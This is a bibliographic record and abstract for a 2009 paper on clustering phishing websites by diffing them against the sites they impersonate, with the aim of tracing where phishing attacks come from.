Using Differencing to Increase Distinctiveness for Phishing Website Clustering

  • Authors:
  • Robert Layton;Simon Brown;Paul Watters

  • Affiliations:
  • -;-;-

  • Venue:
  • UIC-ATC '09 Proceedings of the 2009 Symposia and Workshops on Ubiquitous, Autonomic and Trusted Computing
  • Year:
  • 2009

Quantified Score

Hi-index 0.00

Visualization

Abstract

Phishing webpages present a previously underused resource for information on determining provenance of phishing attacks.Phishing webpages aim to impersonate a legitimate website in order to trick their potential victims into revealing their confidential data, such as usernames and passwords.However different phishing webpages often contain small differences and these differences can provide a great deal of evidence on the provenance of phishing attacks.When impersonating a webpage, there is often a large amount of `redundant' information, as much of the original, impersonated website is found in phishing websites, making phishing websites across different attacks very similar.In order to attempt to overcome this issue, a diff can be used which takes the phishing and original websites as input and returns the differences between the two.These differences present a new view on the data that is previously unused and presents a novel way to increase the ability of clustering algorithms to find good, distinct and separated clusters within the data.The research presented here outlines this diff process and shows that for the data used, comparable results were obtained while the dimensionality of the dataset was reduced.This reduction in size allows for clustering algorithms to complete faster, due to the reduced dimensionality of the dataset.